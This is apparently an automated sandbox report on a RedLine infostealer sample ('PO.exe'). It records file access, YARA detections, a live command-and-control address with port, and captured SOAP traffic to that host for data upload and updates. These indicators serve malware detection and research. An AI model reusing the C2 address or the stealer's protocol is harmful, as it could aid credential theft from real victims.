Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 4x nop then jmp 07A5794Bh		7_2_07A57B32
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 4x nop then jmp 07AA6DBBh		16_2_07AA6FA3

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 45.137.22.67:55615

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49723

Source: global traffic

TCP traffic: 192.168.2.5:49710 -> 45.137.22.67:55615

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.67:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.67:55615Content-Length: 559666Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.67:55615Content-Length: 559658Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.67:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.67:55615Content-Length: 559133Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.67:55615Content-Length: 559125Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.67

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.000000000347E000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.67:55615
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.67:55615/
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.67:55615t-
Source: PO.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: PO.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PO.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: PO.exe, 0000000E.00000002.2276292357.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.000000000300B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: PO.exe, 00000007.00000002.2160002789.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2245706074.0000000003018000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.000000000300B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000003019000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: PO.exe	String found in binary or memory: http://www.aforgenet.com/framework/
Source: AJzHYZtQIb.exe, 00000010.00000002.2245706074.0000000002F69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.or
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: PO.exe	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0017720F	0_2_0017720F
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0017E3FB	0_2_0017E3FB
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0017837D	0_2_0017837D
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0018E430	0_2_0018E430
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00192578	0_2_00192578
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00172606	0_2_00172606
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_001927A7	0_2_001927A7
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00180870	0_2_00180870
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00178934	0_2_00178934
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0019AA50	0_2_0019AA50
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0017FBD3	0_2_0017FBD3
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00178D89	0_2_00178D89
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0019EE32	0_2_0019EE32
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0019AEFE	0_2_0019AEFE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_05B70670	7_2_05B70670
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_05B7D210	7_2_05B7D210
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_05B7E818	7_2_05B7E818
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_05B7E80A	7_2_05B7E80A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E540F	7_2_070E540F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E61BC	7_2_070E61BC
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E4FE8	7_2_070E4FE8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E2C18	7_2_070E2C18
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E96D0	7_2_070E96D0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E5387	7_2_070E5387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E539C	7_2_070E539C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E4FD8	7_2_070E4FD8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E9DE0	7_2_070E9DE0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E9DF0	7_2_070E9DF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E2C09	7_2_070E2C09
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_070E99AB	7_2_070E99AB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A51628	7_2_07A51628
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A52E38	7_2_07A52E38
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A51638	7_2_07A51638
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 7_2_07A59E60	7_2_07A59E60
